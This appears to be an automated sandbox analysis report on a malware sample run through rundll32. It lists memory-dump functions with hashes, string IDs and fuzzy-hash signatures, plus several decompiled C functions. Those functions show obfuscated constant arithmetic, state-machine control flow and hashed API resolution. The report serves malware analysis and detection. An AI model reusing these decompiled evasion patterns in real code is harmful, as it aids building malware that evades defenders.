                                                                      0x01ff36be
                                                                      0x01ff36c2
                                                                      0x01ff36c9
                                                                      0x01ff36d0
                                                                      0x01ff36d4
                                                                      0x01ff36db
                                                                      0x01ff36e2
                                                                      0x01ff36e9
                                                                      0x01ff36f4
                                                                      0x01ff36f9
                                                                      0x01ff36fc
                                                                      0x01ff3703
                                                                      0x01ff370a
                                                                      0x01ff3711
                                                                      0x01ff3715
                                                                      0x01ff3719
                                                                      0x01ff3720
                                                                      0x01ff3727
                                                                      0x01ff372e
                                                                      0x01ff3735
                                                                      0x01ff373c
                                                                      0x01ff3743
                                                                      0x01ff374f
                                                                      0x01ff3752
                                                                      0x01ff3759
                                                                      0x01ff375c
                                                                      0x01ff3783
                                                                      0x01ff37a1

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )/$mh.$q:
                                                                      • API String ID: 0-1096206879
                                                                      • Opcode ID: baadf8516e41e57158cac1776ef02908ebad985f4a9e4f0354fb67aaff5d33bf
                                                                      • Instruction ID: 54a7636f0b23cf88ea961cdf2144abc10a871b398cd6da132c2aa136a18169bc
                                                                      • Opcode Fuzzy Hash: baadf8516e41e57158cac1776ef02908ebad985f4a9e4f0354fb67aaff5d33bf
                                                                      • Instruction Fuzzy Hash: 1E410272D0021DEBEF09CFA1C94A8DEBFB2FB08314F108159E911761A0D7B90A15DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00232B70, Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )/$mh.$q:
                                                                      • API String ID: 0-1096206879
                                                                      • Opcode ID: faa8d97aed7430308da457e4245d4afb6c19da8b4dae1242b9d781458652ed5d
                                                                      • Instruction ID: cd6d67532699a8518d8cad92d337052e59f17a99f9b19cf13507a1961bdd0c99
                                                                      • Opcode Fuzzy Hash: faa8d97aed7430308da457e4245d4afb6c19da8b4dae1242b9d781458652ed5d
                                                                      • Instruction Fuzzy Hash: 8F410272D0021DEBEF09CFA1C94A8DEBFB2FB48314F108158E911762A0D7B90A55DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002368EC, Relevance: 3.8, Strings: 3, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: i#$z"$|2
                                                                      • API String ID: 0-585385020
                                                                      • Opcode ID: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
                                                                      • Instruction ID: 733b59e6853c89347aa9a9e1b2d0037e47a1806f7bbbb44bbaa0abfd0869f10f
                                                                      • Opcode Fuzzy Hash: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
                                                                      • Instruction Fuzzy Hash: F33104B5D1021DEFEF48DFA4C94A4EEBBB5FB44304F108059EA11B6260D3B84A15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023F797, Relevance: 3.8, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +,"$i#$oZ
                                                                      • API String ID: 0-2199921167
                                                                      • Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction ID: 60776dee6b3678e5df2179adf4e1648d32e2816c16b3a96aedfd0de3c431d836
                                                                      • Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction Fuzzy Hash: A1314471D10609EBDB08CFA5DA8A99EFBB0FB40718F208599D406B7250D3B46B98DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF327F, Relevance: 3.8, Strings: 3, Instructions: 56COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E01FF327F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				intOrPtr* _t56;
				signed int _t59;
				signed int _t60;
				void* _t66;

				_t66 = __ecx;
				E02002550(_t46);
				_v20 = 0x3156;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0c55a35f;
				_v12 = 0x42ee;
				_t59 = 0x54;
				_v12 = _v12 / _t59;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x00000e02;
				_v8 = 0x7d69;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 >> 2;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00007fcf;
				_v16 = 0xcf80;
				_v16 = _v16 >> 2;
				_t60 = 0x65;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x000022b9;
				_t56 = E01FF7378(_t60, 0x92ff481d, _t60, 0x90f109b3, 0x80);
				return  *_t56(_t66, _a4, __ecx, __edx, _a4, _a8);
			}












                                                                      0x01ff3289
                                                                      0x01ff3290
                                                                      0x01ff3295
                                                                      0x01ff329f
                                                                      0x01ff32a5
                                                                      0x01ff32ac
                                                                      0x01ff32b8
                                                                      0x01ff32bd
                                                                      0x01ff32c2
                                                                      0x01ff32c6
                                                                      0x01ff32ca
                                                                      0x01ff32d1
                                                                      0x01ff32d8
                                                                      0x01ff32dc
                                                                      0x01ff32e0
                                                                      0x01ff32e4
                                                                      0x01ff32eb
                                                                      0x01ff32f2
                                                                      0x01ff32f9
                                                                      0x01ff3301
                                                                      0x01ff3304
                                                                      0x01ff3323
                                                                      0x01ff3335

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V1$i}$B
                                                                      • API String ID: 0-126001315
                                                                      • Opcode ID: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
                                                                      • Instruction ID: 91a9f477aff46192475a48dc03283e3f3b9d8e0dc9b9ca2fa029976f196b2fa3
                                                                      • Opcode Fuzzy Hash: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
                                                                      • Instruction Fuzzy Hash: BA112676D0060CBBEB09DFD5C84A8DEBBB1EB44708F10C189E914A7284D7B56B58CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002327F3, Relevance: 3.8, Strings: 3, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V1$i}$B
                                                                      • API String ID: 0-126001315
                                                                      • Opcode ID: e53405ebcaadf61612096404f00133a13c00ecb254a195ec2e8729eab100b819
                                                                      • Instruction ID: 59d276b5e3be4e258d77933f1b1587257614f90a4e147a0619c01ebe970a2837
                                                                      • Opcode Fuzzy Hash: e53405ebcaadf61612096404f00133a13c00ecb254a195ec2e8729eab100b819
                                                                      • Instruction Fuzzy Hash: 81111476D0020CBBEB09DFD5C80A8DEBBB5EB44708F10C089E914A7285D7B55B58CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023F793, Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +,"$i#$oZ
                                                                      • API String ID: 0-2199921167
                                                                      • Opcode ID: bf2bae43fa27af6f261db997c93353eed6f3a7671df8ad2c815519cc70e3ba68
                                                                      • Instruction ID: d14a7a481e430117c04287a884c5469bf7d9d6001e96118d04f1a816ef8c31df
                                                                      • Opcode Fuzzy Hash: bf2bae43fa27af6f261db997c93353eed6f3a7671df8ad2c815519cc70e3ba68
                                                                      • Instruction Fuzzy Hash: 1321F371D14619EBDB08CFA5D98A9DEFBB0FB40758F208599C115B7250D3B85B48CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02004C37, Relevance: 2.7, Strings: 2, Instructions: 178COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E02004C37(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t135;
				signed int _t149;
				void* _t150;
				signed int _t153;
				char _t156;
				signed int _t157;
				void* _t160;
				char* _t166;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int* _t191;

				_push(_a8);
				_t181 = __ecx;
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E02002550(_t135);
				_v20 = 0x10;
				_t191 =  &(( &_v76)[4]);
				_v72 = 0x33a2;
				_t157 = 0;
				_t160 = 0x15bff311;
				_t182 = 0x47;
				_v72 = _v72 / _t182;
				_v72 = _v72 + 0x9922;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0x00004e71;
				_v52 = 0xaaa1;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0x01552e09;
				_v76 = 0x962f;
				_v76 = _v76 << 2;
				_v76 = _v76 + 0xc5a1;
				_v76 = _v76 + 0xb22d;
				_v76 = _v76 ^ 0x0003d8ea;
				_v40 = 0xc003;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x0001b379;
				_v44 = 0x4990;
				_t183 = 0x43;
				_v44 = _v44 / _t183;
				_v44 = _v44 ^ 0x000010a0;
				_v48 = 0xc7fb;
				_v48 = _v48 + 0xffffc7ce;
				_v48 = _v48 ^ 0x0000a883;
				_v36 = 0x594;
				_v36 = _v36 | 0x90aa143f;
				_v36 = _v36 ^ 0x90aa6018;
				_v28 = 0x8261;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x0000298c;
				_v32 = 0xe41c;
				_v32 = _v32 + 0xffff1d18;
				_v32 = _v32 ^ 0x00004603;
				_v68 = 0xf178;
				_v68 = _v68 ^ 0xb2146a6f;
				_v68 = _v68 << 0xd;
				_v68 = _v68 + 0xffff14e1;
				_v68 = _v68 ^ 0x9361c313;
				_v60 = 0xf75;
				_t184 = 7;
				_v60 = _v60 / _t184;
				_v60 = _v60 + 0xffffaefc;
				_v60 = _v60 ^ 0xffffe5ce;
				_v56 = 0xf098;
				_t185 = 0x29;
				_v56 = _v56 / _t185;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0000430d;
				_v24 = 0x878b;
				_t186 = 0x32;
				_v24 = _v24 / _t186;
				_v24 = _v24 ^ 0x000010f8;
				_v64 = 0xb5f1;
				_v64 = _v64 << 1;
				_v64 = _v64 + 0xd2ca;
				_v64 = _v64 * 0x3b;
				_v64 = _v64 ^ 0x00840c1f;
				L1:
				while(_t160 != 0xc9ebeee) {
					if(_t160 == 0x15bff311) {
						_t160 = 0xc9ebeee;
						continue;
					}
					if(_t160 == 0x185136eb) {
						_push(0x1ff1484);
						_push(_v48);
						_t150 = E0200CF31(_v40, _v44, __eflags);
						E01FFA6C9(__eflags);
						_t153 = E0200990C(_v28, __eflags, _v32, _v68, 0x40, _v60, _t181,  &_v16, _t150);
						__eflags = _t153;
						_t133 = _t153 > 0;
						__eflags = _t133;
						_t157 = 0 | _t133;
						E02000D6D(_v56, _v24, _v64, _t150);
						L22:
						return _t157;
					}
					if(_t160 != 0x2cfa89b3) {
						L19:
						__eflags = _t160 - 0x12976092;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t166 =  &_v16;
					if(_v16 == _t157) {
						L14:
						_t160 = 0x185136eb;
						continue;
					} else {
						goto L6;
					}
					do {
						L6:
						_t156 =  *_t166;
						if(_t156 < 0x30 || _t156 > 0x39) {
							if(_t156 < 0x61 || _t156 > 0x7a) {
								if(_t156 < 0x41 || _t156 > 0x5a) {
									 *_t166 = 0x58;
								}
							}
						}
						_t166 = _t166 + 1;
					} while ( *_t166 != _t157);
					goto L14;
				}
				_t149 = E0200226D( &_v20, _v72, _v52, _v76,  &_v16);
				_t191 =  &(_t191[3]);
				__eflags = _t149;
				if(__eflags == 0) {
					_t160 = 0x12976092;
					goto L19;
				}
				_t160 = 0x2cfa89b3;
				goto L1;
			}


































                                                                      0x02004c3e
                                                                      0x02004c42
                                                                      0x02004c44
                                                                      0x02004c48
                                                                      0x02004c4a
                                                                      0x02004c4b
                                                                      0x02004c50
                                                                      0x02004c58
                                                                      0x02004c5b
                                                                      0x02004c69
                                                                      0x02004c6b
                                                                      0x02004c72
                                                                      0x02004c77
                                                                      0x02004c7d
                                                                      0x02004c85
                                                                      0x02004c8a
                                                                      0x02004c92
                                                                      0x02004c9a
                                                                      0x02004c9f
                                                                      0x02004ca7
                                                                      0x02004caf
                                                                      0x02004cb4
                                                                      0x02004cbc
                                                                      0x02004cc4
                                                                      0x02004ccc
                                                                      0x02004cd4
                                                                      0x02004cd8
                                                                      0x02004ce0
                                                                      0x02004cec
                                                                      0x02004cf1
                                                                      0x02004cf7
                                                                      0x02004cff
                                                                      0x02004d07
                                                                      0x02004d0f
                                                                      0x02004d17
                                                                      0x02004d1f
                                                                      0x02004d27
                                                                      0x02004d2f
                                                                      0x02004d37
                                                                      0x02004d3c
                                                                      0x02004d44
                                                                      0x02004d4c
                                                                      0x02004d54
                                                                      0x02004d5c
                                                                      0x02004d64
                                                                      0x02004d6c
                                                                      0x02004d71
                                                                      0x02004d79
                                                                      0x02004d81
                                                                      0x02004d8d
                                                                      0x02004d92
                                                                      0x02004d98
                                                                      0x02004da0
                                                                      0x02004da8
                                                                      0x02004db4
                                                                      0x02004db7
                                                                      0x02004dbb
                                                                      0x02004dc0
                                                                      0x02004dca
                                                                      0x02004dd8
                                                                      0x02004de5
                                                                      0x02004de9
                                                                      0x02004df1
                                                                      0x02004df9
                                                                      0x02004dfd
                                                                      0x02004e0a
                                                                      0x02004e0e
                                                                      0x00000000
                                                                      0x02004e16
                                                                      0x02004e20
                                                                      0x02004e5e
                                                                      0x00000000
                                                                      0x02004e5e
                                                                      0x02004e24
                                                                      0x02004e9d
                                                                      0x02004ea2
                                                                      0x02004eae
                                                                      0x02004eb9
                                                                      0x02004ed9
                                                                      0x02004ee0
                                                                      0x02004eeb
                                                                      0x02004eeb
                                                                      0x02004eeb
                                                                      0x02004ef2
                                                                      0x02004efd
                                                                      0x02004f03
                                                                      0x02004f03
                                                                      0x02004e2c
                                                                      0x02004e8f
                                                                      0x02004e8f
                                                                      0x02004e95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02004e9b
                                                                      0x02004e2e
                                                                      0x02004e36
                                                                      0x02004e5a
                                                                      0x02004e5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02004e38
                                                                      0x02004e38
                                                                      0x02004e38
                                                                      0x02004e3c
                                                                      0x02004e44
                                                                      0x02004e4c
                                                                      0x02004e52
                                                                      0x02004e52
                                                                      0x02004e4c
                                                                      0x02004e44
                                                                      0x02004e55
                                                                      0x02004e56
                                                                      0x00000000
                                                                      0x02004e38
                                                                      0x02004e77
                                                                      0x02004e7c
                                                                      0x02004e7f
                                                                      0x02004e81
                                                                      0x02004e8a
                                                                      0x00000000
                                                                      0x02004e8a
                                                                      0x02004e83
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$qN
                                                                      • API String ID: 0-790040163
                                                                      • Opcode ID: 4adea902eccb2d5c3e9ddf963b6978523b0ceeadc5e16dbefd8d5871c3203429
                                                                      • Instruction ID: cfb9e437a3265d2c262128c205c5904fdbed8432f68a347e908b31ecd2ef1a96
                                                                      • Opcode Fuzzy Hash: 4adea902eccb2d5c3e9ddf963b6978523b0ceeadc5e16dbefd8d5871c3203429
                                                                      • Instruction Fuzzy Hash: FC7187715083819FE354CF26C98855FBBE2EBC5B18F40491CF295862A0D7B5CA0ADF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002441AB, Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$qN
                                                                      • API String ID: 0-790040163
                                                                      • Opcode ID: 3664b42d23cba470b360c6ad181b5cbbd14683b7db110bcae712de3154e60996
                                                                      • Instruction ID: db0136545eb7e86a3a891072699514cc98e2b1ae3095e6700b1611c6bfa4fcdc
                                                                      • Opcode Fuzzy Hash: 3664b42d23cba470b360c6ad181b5cbbd14683b7db110bcae712de3154e60996
                                                                      • Instruction Fuzzy Hash: 1271B7711183019FE358DF26C98961FBBE1EBC0B08F50895CF181862A0C3B5CA5ACF83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF57D4, Relevance: 2.7, Strings: 2, Instructions: 161COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E01FF57D4(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ecx;
				void* _t131;
				intOrPtr _t147;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t159;
				intOrPtr* _t177;
				void* _t179;
				void* _t180;

				_t177 = _a4;
				_t176 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t177);
				_push(__edx);
				E02002550(_t131);
				_v80 = 0x4cb2ed;
				_v76 = 0;
				_t180 = _t179 + 0x18;
				_v72 = 0;
				_v108 = 0x9c5c;
				_t159 = 0x3368839;
				_v108 = _v108 ^ 0xd3e57123;
				_v108 = _v108 ^ 0x4ad8fda9;
				_v108 = _v108 ^ 0x993d5beb;
				_v88 = 0xf9a5;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x0000103e;
				_v120 = 0xbbb7;
				_t154 = 0x79;
				_v120 = _v120 / _t154;
				_v120 = _v120 + 0xffffc937;
				_v120 = _v120 ^ 0xd13f0730;
				_v120 = _v120 ^ 0x2ec0cb4d;
				_v104 = 0xc6c8;
				_v104 = _v104 | 0xbfb93240;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0xb9f6c47b;
				_v124 = 0xc4b4;
				_v124 = _v124 + 0x286;
				_t155 = 0x5f;
				_v124 = _v124 * 0xf;
				_v124 = _v124 + 0x3b2;
				_v124 = _v124 ^ 0x000bab89;
				_v128 = 0xc484;
				_v128 = _v128 + 0xba23;
				_v128 = _v128 >> 4;
				_v128 = _v128 | 0x65c5919c;
				_v128 = _v128 ^ 0x65c5d8de;
				_v100 = 0x428;
				_v100 = _v100 << 6;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x4280342d;
				_v116 = 0x3c02;
				_v116 = _v116 << 4;
				_v116 = _v116 / _t155;
				_t156 = 0x15;
				_v116 = _v116 / _t156;
				_v116 = _v116 ^ 0x000042c4;
				_v84 = 0x30d9;
				_v84 = _v84 ^ 0x97ed8beb;
				_v84 = _v84 ^ 0x97eda4f0;
				_v92 = 0x87d4;
				_v92 = _v92 + 0xffff3816;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0xffefeeaa;
				_v96 = 0xe0b5;
				_v96 = _v96 * 0x4f;
				_v96 = _v96 + 0xffff6770;
				_v96 = _v96 ^ 0x0044a5e8;
				_v112 = 0x5d17;
				_v112 = _v112 ^ 0xac640b72;
				_v112 = _v112 + 0xffff1fa4;
				_v112 = _v112 << 7;
				_v112 = _v112 ^ 0x31bb0480;
				do {
					while(_t159 != 0x3368839) {
						if(_t159 == 0x227ced25) {
							E01FFF834( *_t176, _v100,  &_v68, _v116);
							_t180 = _t180 + 8;
							_t159 = 0x333b911b;
							continue;
						} else {
							if(_t159 == 0x240f0f59) {
								E01FFFEE3(_t177,  &_v68, _v120, _v104, _v124, _v128);
								_t180 = _t180 + 0x10;
								_t159 = 0x227ced25;
								continue;
							} else {
								if(_t159 == 0x25527f2b) {
									_push(_t159);
									_t147 = E01FF54FB( *(_t177 + 4));
									 *_t177 = _t147;
									__eflags = _t147;
									if(__eflags != 0) {
										_t159 = 0x240f0f59;
										continue;
									}
								} else {
									if(_t159 == 0x303334f6) {
										 *(_t177 + 4) = E02000672(_t176);
										_t159 = 0x25527f2b;
										continue;
									} else {
										_t188 = _t159 - 0x333b911b;
										if(_t159 != 0x333b911b) {
											goto L15;
										} else {
											E01FFBAD2(_v84, _v92, _t188, _t176 + 4,  &_v68, _v96);
										}
									}
								}
							}
						}
						L8:
						return 0 |  *_t177 != 0x00000000;
					}
					_t159 = 0x303334f6;
					 *_t177 = 0;
					 *(_t177 + 4) = _v112;
					L15:
					__eflags = _t159 - 0x19576d5a;
				} while (__eflags != 0);
				goto L8;
			}





























                                                                      0x01ff57dd
                                                                      0x01ff57e5
                                                                      0x01ff57ec
                                                                      0x01ff57ed
                                                                      0x01ff57f4
                                                                      0x01ff57fb
                                                                      0x01ff57fc
                                                                      0x01ff57fe
                                                                      0x01ff5803
                                                                      0x01ff580d
                                                                      0x01ff5811
                                                                      0x01ff5814
                                                                      0x01ff581a
                                                                      0x01ff5822
                                                                      0x01ff5827
                                                                      0x01ff582f
                                                                      0x01ff5837
                                                                      0x01ff583f
                                                                      0x01ff5847
                                                                      0x01ff584c
                                                                      0x01ff5854
                                                                      0x01ff5862
                                                                      0x01ff5867
                                                                      0x01ff586d
                                                                      0x01ff5875
                                                                      0x01ff587d
                                                                      0x01ff5885
                                                                      0x01ff588d
                                                                      0x01ff5895
                                                                      0x01ff589a
                                                                      0x01ff58a2
                                                                      0x01ff58aa
                                                                      0x01ff58b7
                                                                      0x01ff58ba
                                                                      0x01ff58be
                                                                      0x01ff58c6
                                                                      0x01ff58ce
                                                                      0x01ff58d6
                                                                      0x01ff58de
                                                                      0x01ff58e3
                                                                      0x01ff58eb
                                                                      0x01ff58f3
                                                                      0x01ff58fb
                                                                      0x01ff5900
                                                                      0x01ff5905
                                                                      0x01ff590d
                                                                      0x01ff5915
                                                                      0x01ff5922
                                                                      0x01ff592a
                                                                      0x01ff592d
                                                                      0x01ff5931
                                                                      0x01ff5939
                                                                      0x01ff5941
                                                                      0x01ff5949
                                                                      0x01ff5951
                                                                      0x01ff5959
                                                                      0x01ff5961
                                                                      0x01ff5966
                                                                      0x01ff596e
                                                                      0x01ff597b
                                                                      0x01ff597f
                                                                      0x01ff5987
                                                                      0x01ff5994
                                                                      0x01ff599c
                                                                      0x01ff59a4
                                                                      0x01ff59ac
                                                                      0x01ff59b1
                                                                      0x01ff59b9
                                                                      0x01ff59b9
                                                                      0x01ff59cb
                                                                      0x01ff5a87
                                                                      0x01ff5a8c
                                                                      0x01ff5a8f
                                                                      0x00000000
                                                                      0x01ff59d1
                                                                      0x01ff59d3
                                                                      0x01ff5a66
                                                                      0x01ff5a6b
                                                                      0x01ff5a6e
                                                                      0x00000000
                                                                      0x01ff59d5
                                                                      0x01ff59db
                                                                      0x01ff5a3c
                                                                      0x01ff5a3d
                                                                      0x01ff5a42
                                                                      0x01ff5a45
                                                                      0x01ff5a47
                                                                      0x01ff5a49
                                                                      0x00000000
                                                                      0x01ff5a49
                                                                      0x01ff59dd
                                                                      0x01ff59e3
                                                                      0x01ff5a27
                                                                      0x01ff5a2a
                                                                      0x00000000
                                                                      0x01ff59e5
                                                                      0x01ff59e5
                                                                      0x01ff59eb
                                                                      0x00000000
                                                                      0x01ff59f1
                                                                      0x01ff5a06
                                                                      0x01ff5a0b
                                                                      0x01ff59eb
                                                                      0x01ff59e3
                                                                      0x01ff59db
                                                                      0x01ff59d3
                                                                      0x01ff5a0f
                                                                      0x01ff5a1f
                                                                      0x01ff5a1f
                                                                      0x01ff5a9d
                                                                      0x01ff5aa2
                                                                      0x01ff5aa4
                                                                      0x01ff5aa7
                                                                      0x01ff5aa7
                                                                      0x01ff5aa7
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %|"$%|"
                                                                      • API String ID: 0-2582732878
                                                                      • Opcode ID: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
                                                                      • Instruction ID: fab0312c6384c575caab7b6b3eadc9ed091e8227830ea2a4c6cc227325d565b6
                                                                      • Opcode Fuzzy Hash: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
                                                                      • Instruction Fuzzy Hash: 5C715571109341AFE768CF65C98981FBBE1BFC4718F409A1DF2C696260C7B58A49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00234D48, Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %|"$%|"
                                                                      • API String ID: 0-2582732878
                                                                      • Opcode ID: dcf0d0cf0a998f2391e1bfd2c442f01b02ad6d522a666d75066037e3d3353ea2
                                                                      • Instruction ID: 8ef152a648dc22ca9aa889e6764a6220961d42fa82fd4b6a84efa9d0dfc48b07
                                                                      • Opcode Fuzzy Hash: dcf0d0cf0a998f2391e1bfd2c442f01b02ad6d522a666d75066037e3d3353ea2
                                                                      • Instruction Fuzzy Hash: 137176B11193019FD798DF21C98981FBBE1BFC8708F549A1DF1CA96260C7B49A59CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

